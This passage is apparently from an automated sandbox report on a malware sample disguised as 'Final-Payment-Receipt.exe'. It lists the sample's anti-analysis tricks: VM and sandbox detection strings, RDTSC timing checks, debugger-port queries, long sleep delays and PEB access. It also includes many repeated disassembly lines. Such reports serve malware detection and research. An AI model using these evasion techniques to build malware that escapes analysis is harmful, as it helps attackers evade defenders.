          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Final-Payment-Receipt.exe PID: 1692, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000002EB98E4 second address: 0000000002EB98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000002EB9B5E second address: 0000000002EB9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 5772Thread sleep time: -52501s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 6088Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4568Thread sleep count: 39 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4568Thread sleep time: -78000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5456Thread sleep time: -75000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.246034971.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.236884381.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
          Source: explorer.exe, 00000002.00000002.494413702.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.241386939.00000000053A0000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F4
          Source: explorer.exe, 00000002.00000002.490839971.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000002.499236558.00000000053A0000.00000004.00000001.sdmpBinary or memory string: AF_UNIXa0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.499263196.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          <
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E513A mov eax, dword ptr fs:[00000030h]1_2_013E513A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E513A mov eax, dword ptr fs:[00000030h]1_2_013E513A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov ecx, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]1_2_013B9100
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]1_2_013B9100
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]1_2_013B9100
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB171 mov eax, dword ptr fs:[00000030h]1_2_013BB171
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB171 mov eax, dword ptr fs:[00000030h]1_2_013BB171
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC962 mov eax, dword ptr fs:[00000030h]1_2_013BC962
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB944 mov eax, dword ptr fs:[00000030h]1_2_013DB944
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB944 mov eax, dword ptr fs:[00000030h]1_2_013DB944
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E61A0 mov eax, dword ptr fs:[00000030h]1_2_013E61A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E61A0 mov eax, dword ptr fs:[00000030h]1_2_013E61A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014441E8 mov eax, dword ptr fs:[00000030h]1_2_014441E8
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2990 mov eax, dword ptr fs:[00000030h]1_2_013E2990
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4190 mov eax, dword ptr fs:[00000030h]1_2_013E4190
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA185 mov eax, dword ptr fs:[00000030h]1_2_013EA185
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DC182 mov eax, dword ptr fs:[00000030h]1_2_013DC182
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]1_2_013BB1E1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]1_2_013BB1E1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]1_2_013BB1E1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014369A6 mov eax, dword ptr fs:[00000030h]1_2_014369A6
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]1_2_013DA830
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]1_2_013DA830